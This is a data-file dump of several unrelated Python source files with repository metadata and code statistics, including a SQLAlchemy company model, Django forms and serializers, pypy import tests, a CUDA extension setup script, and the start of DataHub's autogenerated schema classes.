| 26.506849 | 77 | 0.73385 | 259 | 1,935 | 5.409266 | 0.521236 | 0.042827 | 0.089222 | 0.034261 | 0.127052 | 0.071378 | 0.071378 | 0.071378 | 0 | 0 | 0 | 0.014286 | 0.167959 | 1,935 | 72 | 78 | 26.875 | 0.855901 | 0.439793 | 0 | 0.30303 | 0 | 0 | 0.004859 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.030303 | 0.090909 | 0 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1320d5b2a33305aa45a19c64623014beaa611243 | 197 | py | Python | 06-04-dealing-with-html.py | habernal/foundations-of-lang-tech-2020 | 5f40c847821e7b0b2fdc46df05076d33aa434932 | [
"Apache-2.0"
] | null | null | null | 06-04-dealing-with-html.py | habernal/foundations-of-lang-tech-2020 | 5f40c847821e7b0b2fdc46df05076d33aa434932 | [
"Apache-2.0"
] | null | null | null | 06-04-dealing-with-html.py | habernal/foundations-of-lang-tech-2020 | 5f40c847821e7b0b2fdc46df05076d33aa434932 | [
"Apache-2.0"
] | null | null | null | from urllib.request import urlopen
raw_html = urlopen('https://en.wikipedia.org/wiki/Python').read()
print(len(raw_html))
print(raw_html[:400])
html = raw_html.decode('utf-8')
print(html[:400])
| 19.7 | 65 | 0.730964 | 32 | 197 | 4.375 | 0.625 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038674 | 0.081218 | 197 | 9 | 66 | 21.888889 | 0.734807 | 0 | 0 | 0 | 0 | 0 | 0.208122 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
13311140815299992719e63e2f71ba521004ba12 | 673 | py | Python | tests/utils.py | matteobe/loyverse | 04b2359c947eca0d9f9aad46d3bc94edfdb7762b | [
"MIT"
] | null | null | null | tests/utils.py | matteobe/loyverse | 04b2359c947eca0d9f9aad46d3bc94edfdb7762b | [
"MIT"
] | 12 | 2020-11-01T21:24:49.000Z | 2021-01-31T20:26:44.000Z | tests/utils.py | matteobe/loyverse | 04b2359c947eca0d9f9aad46d3bc94edfdb7762b | [
"MIT"
] | 1 | 2020-11-04T12:56:33.000Z | 2020-11-04T12:56:33.000Z | """
Common test utilities
"""
import json
from tests import cassettes_dir
def save_json(response: dict, filename: str) -> None:
"""
Store the response in dictionary format to a JSON file for later inspection
Args:
response (dict): API response in dictionary format (JSON)
filename (str): name of file to store the response to
"""
with open(f'{cassettes_dir}/{filename}.json', 'w') as f:
json.dump(response, f, indent=4, sort_keys=False)
return None
def error_msg(endpoint: str, msg: str) -> str:
"""
Format error messages for tests using endpoint:msg structure
"""
return f'Client.{endpoint}: {msg}.'
| 23.206897 | 79 | 0.658247 | 93 | 673 | 4.709677 | 0.537634 | 0.054795 | 0.073059 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001931 | 0.230312 | 673 | 28 | 80 | 24.035714 | 0.843629 | 0.421991 | 0 | 0 | 0 | 0 | 0.168142 | 0.091445 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
133452b222b7132ad51d27a7473795aefd41e59a | 108 | py | Python | vmaig_blog/uwsgi-2.0.14/plugins/fastrouter/uwsgiplugin.py | StanYaha/Blog | 3cb38918e14ebe6ce2e2952ef272de116849910d | [
"BSD-3-Clause"
] | 1 | 2018-11-24T16:10:49.000Z | 2018-11-24T16:10:49.000Z | vmaig_blog/uwsgi-2.0.14/plugins/fastrouter/uwsgiplugin.py | StanYaha/Blog | 3cb38918e14ebe6ce2e2952ef272de116849910d | [
"BSD-3-Clause"
] | null | null | null | vmaig_blog/uwsgi-2.0.14/plugins/fastrouter/uwsgiplugin.py | StanYaha/Blog | 3cb38918e14ebe6ce2e2952ef272de116849910d | [
"BSD-3-Clause"
] | null | null | null |
NAME='fastrouter'
CFLAGS = []
LDFLAGS = []
LIBS = []
REQUIRES = ['corerouter']
GCC_LIST = ['fastrouter']
| 10.8 | 25 | 0.62037 | 10 | 108 | 6.6 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175926 | 108 | 9 | 26 | 12 | 0.741573 | 0 | 0 | 0 | 0 | 0 | 0.280374 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1334aabb4cc40fc660d4b83bf37016b04c449e9c | 6,940 | py | Python | Model/SqlAlchemy/Company/CompanyInfoModel.py | 825477418/XX | bf46e34749394002eec0fdc65e34c339ce022cab | [
"MIT"
] | null | null | null | Model/SqlAlchemy/Company/CompanyInfoModel.py | 825477418/XX | bf46e34749394002eec0fdc65e34c339ce022cab | [
"MIT"
] | 1 | 2020-06-03T13:54:29.000Z | 2020-06-03T13:54:29.000Z | Model/SqlAlchemy/Company/CompanyInfoModel.py | 825477418/XX | bf46e34749394002eec0fdc65e34c339ce022cab | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/9/29 15:09
# @Author : Peter
# @Des :
# @File : CompanyInfoModel
# @Software: PyCharm
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String, Text
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyInfoModel(Base, BaseModel):
__tablename__ = 'company_info'
id = Column(Integer, primary_key=True)
com_id = Column(Integer, index=True)
web_key = Column(String(255, 'utf8mb4_unicode_ci'))
logo = Column(String(255, 'utf8mb4_unicode_ci'))
name = Column(String(255, 'utf8mb4_unicode_ci'))
tel = Column(String(255, 'utf8mb4_unicode_ci'))
email = Column(String(255, 'utf8mb4_unicode_ci'))
web_url = Column(String(255, 'utf8mb4_unicode_ci'))
Address = Column(String(255, 'utf8mb4_unicode_ci'))
AnnualReports = Column(String(255, 'utf8mb4_unicode_ci'))
CreditCode = Column(String(255, 'utf8mb4_unicode_ci'))
taxpayer_no = Column(String(255, 'utf8mb4_unicode_ci'))
No = Column(String(255, 'utf8mb4_unicode_ci'))
organization_no = Column(String(255, 'utf8mb4_unicode_ci'))
Oper_id = Column(Integer)
OperName = Column(String(255, 'utf8mb4_unicode_ci'))
RegistCapi = Column(String(255, 'utf8mb4_unicode_ci'))
Status = Column(String(255, 'utf8mb4_unicode_ci'))
StartDate = Column(String(255, 'utf8mb4_unicode_ci'))
EconKind = Column(String(255, 'utf8mb4_unicode_ci'))
staff_num = Column(String(255, 'utf8mb4_unicode_ci'))
TermStart = Column(String(255, 'utf8mb4_unicode_ci'))
TeamEnd = Column(String(255, 'utf8mb4_unicode_ci'))
BelongOrg = Column(String(255, 'utf8mb4_unicode_ci'))
CheckDate = Column(String(255, 'utf8mb4_unicode_ci'))
en_name = Column(String(255, 'utf8mb4_unicode_ci'))
register_addr = Column(String(255, 'utf8mb4_unicode_ci'))
industry_belong = Column(String(255, 'utf8mb4_unicode_ci'))
used_name = Column(String(255, 'utf8mb4_unicode_ci'))
location = Column(String(255, 'utf8mb4_unicode_ci'))
Scope = Column(Text(collation='utf8mb4_unicode_ci'))
intro = Column(Text(collation='utf8mb4_unicode_ci'))
EndDate = Column(String(255, 'utf8mb4_unicode_ci'))
Province = Column(String(50, 'utf8mb4_unicode_ci'))
Industry = Column(String(255, 'utf8mb4_unicode_ci'))
ImageUrl = Column(String(255, 'utf8mb4_unicode_ci'))
OrgNo = Column(String(255, 'utf8mb4_unicode_ci'))
EnglishName = Column(String(255, 'utf8mb4_unicode_ci'))
Type = Column(String(255, 'utf8mb4_unicode_ci'))
Tag = Column(String(255, 'utf8mb4_unicode_ci'))
Financing = Column(String(255, 'utf8mb4_unicode_ci'))
DbUpdatedDate = Column(Integer)
ShortStatus = Column(String(20, 'utf8mb4_unicode_ci'))
IsExpired = Column(String(5, 'utf8mb4_unicode_ci'))
DUNSNo = Column(String(25, 'utf8mb4_unicode_ci'))
TaxNo = Column(String(25, 'utf8mb4_unicode_ci'))
CbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
AbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
OpForm = Column(String(5, 'utf8mb4_unicode_ci'))
RecCap = Column(String(55, 'utf8mb4_unicode_ci'))
Liquidation = Column(String(5, 'utf8mb4_unicode_ci'))
SimpleCancellation = Column(String(5, 'utf8mb4_unicode_ci'))
CompanyStatus = Column(Integer)
HoldingType = Column(String(25, 'utf8mb4_unicode_ci'))
id_del = Column(String(255, 'utf8mb4_unicode_ci'))
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.AbuItem = kw.get("AbuItem", None)
self.Address = kw.get("Address", None)
self.AnnualReports = kw.get("AnnualReports", None)
self.BelongOrg = kw.get("BelongOrg", None)
self.CbuItem = kw.get("CbuItem", None)
self.CheckDate = kw.get("CheckDate", None)
self.CompanyStatus = kw.get("CompanyStatus", None)
self.CreditCode = kw.get("CreditCode", None)
self.DUNSNo = kw.get("DUNSNo", None)
self.DbUpdatedDate = kw.get("DbUpdatedDate", None)
self.EconKind = kw.get("EconKind", None)
self.EndDate = kw.get("EndDate", None)
self.EnglishName = kw.get("EnglishName", None)
self.Financing = kw.get("Financing", None)
self.HoldingType = kw.get("HoldingType", None)
self.ImageUrl = kw.get("ImageUrl", None)
self.Industry = kw.get("Industry", None)
self.IsExpired = kw.get("IsExpired", None)
self.Liquidation = kw.get("Liquidation", None)
self.No = kw.get("No", None)
self.OpForm = kw.get("OpForm", None)
self.Oper_id = kw.get("Oper_id", None)
self.OperName = kw.get("OperName", None)
self.OrgNo = kw.get("OrgNo", None)
self.Province = kw.get("Province", None)
self.RecCap = kw.get("RecCap", None)
self.RegistCapi = kw.get("RegistCapi", None)
self.Scope = kw.get("Scope", None)
self.ShortStatus = kw.get("ShortStatus", None)
self.SimpleCancellation = kw.get("SimpleCancellation", None)
self.StartDate = kw.get("StartDate", None)
self.Status = kw.get("Status", None)
self.Tag = kw.get("Tag", None)
self.TaxNo = kw.get("TaxNo", None)
self.TeamEnd = kw.get("TeamEnd", None)
self.TermStart = kw.get("TermStart", None)
self.Type = kw.get("Type", None)
self.com_id = kw.get("com_id", None)
self.web_key = kw.get("web_key", None)
self.create_ts = kw.get("create_ts", None)
self.email = kw.get("email", None)
self.en_name = kw.get("en_name", None)
self.get = kw.get("get", None)
self.getAll = kw.get("getAll", None)
self.getAllIds = kw.get("getAllIds", None)
self.getByFromId = kw.get("getByFromId", None)
self.getByFromIdAndMod = kw.get("getByFromIdAndMod", None)
self.getByName = kw.get("getByName", None)
self.getColumsByFromIdAndMod = kw.get("getColumsByFromIdAndMod", None)
self.id = kw.get("id", None)
self.id_del = kw.get("id_del", None)
self.industry_belong = kw.get("industry_belong", None)
self.intro = kw.get("intro", None)
self.location = kw.get("location", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.organization_no = kw.get("organization_no", None)
self.register_addr = kw.get("register_addr", None)
self.staff_num = kw.get("staff_num", None)
self.taxpayer_no = kw.get("taxpayer_no", None)
self.tel = kw.get("tel", None)
self.updateId = kw.get("updateId", None)
self.update_ts = kw.get("update_ts", None)
self.used_name = kw.get("used_name", None)
self.web_url = kw.get("web_url", None)
if __name__ == '__main__':
createInitFunction(CompanyInfoModel)
| 46.891892 | 78 | 0.659798 | 877 | 6,940 | 5.036488 | 0.147092 | 0.074711 | 0.181118 | 0.179307 | 0.335069 | 0.335069 | 0.046185 | 0 | 0 | 0 | 0 | 0.042143 | 0.193084 | 6,940 | 147 | 79 | 47.210884 | 0.746607 | 0.022046 | 0 | 0 | 0 | 0 | 0.217257 | 0.003392 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007519 | false | 0 | 0.022556 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1337838ed34db711f0a7cc200d22dfd85d470b1a | 426 | py | Python | 3_classes/mdsim/tests/test_integrator/test_md_integrator.py | lpwgroup/programming-tutorial | e70a598f2a34bf87bb30f42d56940fe6f9a0e0c9 | [
"BSD-3-Clause"
] | null | null | null | 3_classes/mdsim/tests/test_integrator/test_md_integrator.py | lpwgroup/programming-tutorial | e70a598f2a34bf87bb30f42d56940fe6f9a0e0c9 | [
"BSD-3-Clause"
] | 1 | 2018-08-22T18:26:11.000Z | 2018-08-22T18:26:59.000Z | 3_classes/mdsim/tests/test_integrator/test_md_integrator.py | lpwgroup/programming-tutorial | e70a598f2a34bf87bb30f42d56940fe6f9a0e0c9 | [
"BSD-3-Clause"
] | null | null | null | import pytest
import numpy as np
from mdsim.molecule import Molecule
from mdsim.integrator import MDIntegrator
def test_init():
integrator = MDIntegrator()
assert isinstance(integrator, MDIntegrator)
def test_integrate():
integrator = MDIntegrator()
molecule = Molecule()
# integrate() is not implemented in parent class
with pytest.raises(NotImplementedError):
integrator.integrate(molecule) | 28.4 | 52 | 0.755869 | 46 | 426 | 6.956522 | 0.543478 | 0.20625 | 0.11875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173709 | 426 | 15 | 53 | 28.4 | 0.909091 | 0.107981 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
1337cae31a695ef1fb38e4c6593e999e11530ea8 | 538 | py | Python | teamcat_service/docker_build/target/one_step_build/teamcat/doraemon/api/auth/serializer/user_serializer.py | zhangyin2088/Teamcat | be9be8d7c1e58c8d2d22ab78d25783d9aee4de71 | [
"Apache-2.0"
] | 6 | 2018-11-26T08:42:52.000Z | 2020-06-01T08:33:48.000Z | teamcat_service/doraemon/doraemon/api/auth/serializer/user_serializer.py | zhangyin2088/Teamcat | be9be8d7c1e58c8d2d22ab78d25783d9aee4de71 | [
"Apache-2.0"
] | null | null | null | teamcat_service/doraemon/doraemon/api/auth/serializer/user_serializer.py | zhangyin2088/Teamcat | be9be8d7c1e58c8d2d22ab78d25783d9aee4de71 | [
"Apache-2.0"
] | 1 | 2019-01-22T06:45:36.000Z | 2019-01-22T06:45:36.000Z | #coding=utf-8
'''
Created on 2016-10-12
@author: Administrator
'''
from rest_framework import serializers
from django.contrib.auth.models import User
class UserSerializer(serializers.ModelSerializer):
name=serializers.SerializerMethodField()
class Meta:
model = User
exclude=('password','first_name','last_name','is_superuser','groups','user_permissions')
read_only_fields = ('id',)
depth=2
def get_name(self, obj):
return obj.last_name+obj.first_name
| 23.391304 | 96 | 0.665428 | 62 | 538 | 5.612903 | 0.741935 | 0.051724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023923 | 0.223048 | 538 | 23 | 97 | 23.391304 | 0.808612 | 0.107807 | 0 | 0 | 0 | 0 | 0.133192 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.181818 | 0.090909 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
133e89d977ba42a62361e677163f098bc9eab746 | 2,503 | py | Python | pypy/module/cpyext/test/test_import.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-06-02T23:02:09.000Z | 2021-06-02T23:02:09.000Z | pypy/module/cpyext/test/test_import.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-03-30T18:08:41.000Z | 2021-03-30T18:08:41.000Z | pypy/module/cpyext/test/test_import.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | from pypy.module.cpyext.test.test_api import BaseApiTest
from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase
from pypy.module.cpyext.import_ import *
from pypy.module.cpyext.import_ import (
_PyImport_AcquireLock, _PyImport_ReleaseLock)
from rpython.rtyper.lltypesystem import rffi
class TestImport(BaseApiTest):
def test_import(self, space):
stat = PyImport_Import(space, space.wrap("stat"))
assert stat
assert space.getattr(stat, space.wrap("S_IMODE"))
def test_addmodule(self, space):
with rffi.scoped_str2charp("sys") as modname:
w_sys = PyImport_AddModule(space, modname)
assert w_sys is space.sys
with rffi.scoped_str2charp("foobar") as modname:
w_foobar = PyImport_AddModule(space, modname)
assert space.text_w(space.getattr(w_foobar,
space.wrap('__name__'))) == 'foobar'
def test_getmoduledict(self, space, api):
testmod = "imghdr"
w_pre_dict = PyImport_GetModuleDict(space, )
assert not space.contains_w(w_pre_dict, space.wrap(testmod))
with rffi.scoped_str2charp(testmod) as modname:
w_module = PyImport_ImportModule(space, modname)
print w_module
assert w_module
w_dict = PyImport_GetModuleDict(space, )
assert space.contains_w(w_dict, space.wrap(testmod))
def test_reload(self, space):
stat = PyImport_Import(space, space.wrap("stat"))
space.delattr(stat, space.wrap("S_IMODE"))
stat = PyImport_ReloadModule(space, stat)
assert space.getattr(stat, space.wrap("S_IMODE"))
def test_ImportModuleLevelObject(self, space):
w_mod = PyImport_ImportModuleLevelObject(
space, space.wrap('stat'), None, None, None, 0)
assert w_mod
assert space.getattr(w_mod, space.wrap("S_IMODE"))
def test_lock(self, space):
# "does not crash"
_PyImport_AcquireLock(space, )
_PyImport_AcquireLock(space, )
_PyImport_ReleaseLock(space, )
_PyImport_ReleaseLock(space, )
class AppTestImportLogic(AppTestCpythonExtensionBase):
def test_import_logic(self):
import sys, os
path = self.compile_module('test_import_module',
source_files=[os.path.join(self.here, 'test_import_module.c')])
sys.path.append(os.path.dirname(path))
import test_import_module
assert test_import_module.TEST is None
| 38.507692 | 77 | 0.675589 | 300 | 2,503 | 5.393333 | 0.233333 | 0.055624 | 0.034611 | 0.049444 | 0.302225 | 0.202719 | 0.114957 | 0.114957 | 0.114957 | 0.059333 | 0 | 0.002073 | 0.228925 | 2,503 | 64 | 78 | 39.109375 | 0.836269 | 0.006392 | 0 | 0.153846 | 0 | 0 | 0.043058 | 0 | 0 | 0 | 0 | 0 | 0.211538 | 0 | null | null | 0 | 0.557692 | null | null | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
133ea567de2500445cdac9287e2c77d664b04fae | 321 | py | Python | drinks/forms.py | Mohit7143/class | 7859447c77548f54b590db73b678828e3bc91305 | [
"BSD-3-Clause"
] | null | null | null | drinks/forms.py | Mohit7143/class | 7859447c77548f54b590db73b678828e3bc91305 | [
"BSD-3-Clause"
] | null | null | null | drinks/forms.py | Mohit7143/class | 7859447c77548f54b590db73b678828e3bc91305 | [
"BSD-3-Clause"
] | null | null | null | from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import Article,Comment
class initform(forms.ModelForm):
class Meta:
model = Article
fields = ['title','content',]
class commentadd(forms.ModelForm):
class Meta:
model = Comment
fields = ['content',] | 21.4 | 55 | 0.71028 | 38 | 321 | 5.947368 | 0.552632 | 0.088496 | 0.168142 | 0.20354 | 0.247788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193146 | 321 | 15 | 56 | 21.4 | 0.872587 | 0 | 0 | 0.181818 | 0 | 0 | 0.059006 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1355b07837bf38e58a8e362e15790c8a2b739ed8 | 232 | py | Python | python/nbody/body.py | jacksonlanecole/rk_genetic | 9f87eedd418ba182d2e6cdde24e35b7f20f7ac65 | [
"MIT"
] | null | null | null | python/nbody/body.py | jacksonlanecole/rk_genetic | 9f87eedd418ba182d2e6cdde24e35b7f20f7ac65 | [
"MIT"
] | null | null | null | python/nbody/body.py | jacksonlanecole/rk_genetic | 9f87eedd418ba182d2e6cdde24e35b7f20f7ac65 | [
"MIT"
] | null | null | null | class Body(object):
def __init__(self, mass, position, velocity, name = None):
if (name != None):
self.name = name
self.mass = mass
self.position = position
self.velocity = velocity
| 23.2 | 62 | 0.568966 | 26 | 232 | 4.923077 | 0.461538 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.327586 | 232 | 9 | 63 | 25.777778 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
13607b6083bd59eba24c5f4ac48a34048b55f642 | 1,327 | py | Python | imaginaire/third_party/bias_act/setup.py | hw07216/imaginaire | 87c774114622e39488a5ea8a7728b1a20896afb9 | [
"RSA-MD"
] | 3,308 | 2020-07-15T17:50:13.000Z | 2022-03-31T14:53:31.000Z | imaginaire/third_party/bias_act/setup.py | hw07216/imaginaire | 87c774114622e39488a5ea8a7728b1a20896afb9 | [
"RSA-MD"
] | 132 | 2020-09-20T17:36:28.000Z | 2022-03-28T12:40:03.000Z | src/imaginaire/third_party/bias_act/setup.py | livingbio/imaginaire-fsvid2vid | d82c87aced50afd44fd162491ba5b59056b74034 | [
"RSA-MD"
] | 370 | 2020-09-29T00:34:08.000Z | 2022-03-30T04:12:48.000Z | # flake8: noqa
from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CUDAExtension
import os
cuda_version = os.getenv('CUDA_VERSION')
print('CUDA_VERSION: {}'.format(cuda_version))
nvcc_args = list()
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_50,code=sm_50')
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_52,code=sm_52')
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_60,code=sm_60')
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_61,code=sm_61')
nvcc_args.append('-gencode')
nvcc_args.append('arch=compute_70,code=sm_70')
nvcc_args.append('-gencode')
nvcc_args.append('arch=compute_75,code=sm_75')
if cuda_version is not None:
if cuda_version >= '11.0':
nvcc_args.append('-gencode')
nvcc_args.append('arch=compute_80,code=sm_80')
nvcc_args.append('-Xcompiler')
nvcc_args.append('-Wall')
nvcc_args.append('-std=c++14')
setup(
name='bias_act_cuda',
py_modules=['bias_act'],
ext_modules=[
CUDAExtension('bias_act_cuda', [
'./src/bias_act_cuda.cc',
'./src/bias_act_cuda_kernel.cu'
], extra_compile_args={'cxx': ['-Wall', '-std=c++14'],
'nvcc': nvcc_args})
],
cmdclass={
'build_ext': BuildExtension
})
| 30.159091 | 67 | 0.679729 | 188 | 1,327 | 4.505319 | 0.319149 | 0.179457 | 0.280992 | 0.173554 | 0.380165 | 0.380165 | 0.380165 | 0.380165 | 0.380165 | 0 | 0 | 0.032 | 0.152223 | 1,327 | 43 | 68 | 30.860465 | 0.720889 | 0.238131 | 0 | 0.1 | 0 | 0 | 0.274725 | 0.128871 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.033333 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
136be5dc3a62ef4e558aa31281aabfb145f6c5aa | 316,016 | py | Python | metadata-ingestion/src/datahub/metadata/schema_classes.py | eileenjc/datahub | 44ed2f36849a424153e21c4e3667184cfcb61fca | [
"Apache-2.0"
] | null | null | null | metadata-ingestion/src/datahub/metadata/schema_classes.py | eileenjc/datahub | 44ed2f36849a424153e21c4e3667184cfcb61fca | [
"Apache-2.0"
] | null | null | null | metadata-ingestion/src/datahub/metadata/schema_classes.py | eileenjc/datahub | 44ed2f36849a424153e21c4e3667184cfcb61fca | [
"Apache-2.0"
] | 1 | 2021-07-09T14:30:49.000Z | 2021-07-09T14:30:49.000Z | # flake8: noqa
# This file is autogenerated by /metadata-ingestion/scripts/avro_codegen.py
# Do not modify manually!
# fmt: off
import json
import os.path
import decimal
import datetime
import six
from avrogen.dict_wrapper import DictWrapper
from avrogen import avrojson
from avro.schema import RecordSchema, SchemaFromJSONData as make_avsc_object
from avro import schema as avro_schema
from typing import List, Dict, Union, Optional
def __read_file(file_name):
with open(file_name, "r") as f:
return f.read()
def __get_names_and_schema(json_str):
names = avro_schema.Names()
schema = make_avsc_object(json.loads(json_str), names)
return names, schema
SCHEMA_JSON_STR = __read_file(os.path.join(os.path.dirname(__file__), "schema.avsc"))
__NAMES, SCHEMA = __get_names_and_schema(SCHEMA_JSON_STR)
__SCHEMAS: Dict[str, RecordSchema] = {}
def get_schema_type(fullname):
return __SCHEMAS.get(fullname)
__SCHEMAS = dict((n.fullname.lstrip("."), n) for n in six.itervalues(__NAMES.names))
class KafkaAuditHeaderClass(DictWrapper):
"""This header records information about the context of an event as it is emitted into kafka and is intended to be used by the kafka audit application. For more information see go/kafkaauditheader"""
RECORD_SCHEMA = get_schema_type("com.linkedin.events.KafkaAuditHeader")
def __init__(self,
time: int,
server: str,
appName: str,
messageId: bytes,
instance: Union[None, str]=None,
auditVersion: Union[None, int]=None,
fabricUrn: Union[None, str]=None,
clusterConnectionString: Union[None, str]=None,
):
super().__init__()
self.time = time
self.server = server
self.instance = instance
self.appName = appName
self.messageId = messageId
self.auditVersion = auditVersion
self.fabricUrn = fabricUrn
self.clusterConnectionString = clusterConnectionString
@classmethod
def construct_with_defaults(cls) -> "KafkaAuditHeaderClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.time = int()
self.server = str()
self.instance = self.RECORD_SCHEMA.field_map["instance"].default
self.appName = str()
self.messageId = bytes()
self.auditVersion = self.RECORD_SCHEMA.field_map["auditVersion"].default
self.fabricUrn = self.RECORD_SCHEMA.field_map["fabricUrn"].default
self.clusterConnectionString = self.RECORD_SCHEMA.field_map["clusterConnectionString"].default
@property
def time(self) -> int:
"""Getter: The time at which the event was emitted into kafka."""
return self._inner_dict.get('time') # type: ignore
@time.setter
def time(self, value: int) -> None:
"""Setter: The time at which the event was emitted into kafka."""
self._inner_dict['time'] = value
@property
def server(self) -> str:
"""Getter: The fully qualified name of the host from which the event is being emitted."""
return self._inner_dict.get('server') # type: ignore
@server.setter
def server(self, value: str) -> None:
"""Setter: The fully qualified name of the host from which the event is being emitted."""
self._inner_dict['server'] = value
@property
def instance(self) -> Union[None, str]:
"""Getter: The instance on the server from which the event is being emitted. e.g. i001"""
return self._inner_dict.get('instance') # type: ignore
@instance.setter
def instance(self, value: Union[None, str]) -> None:
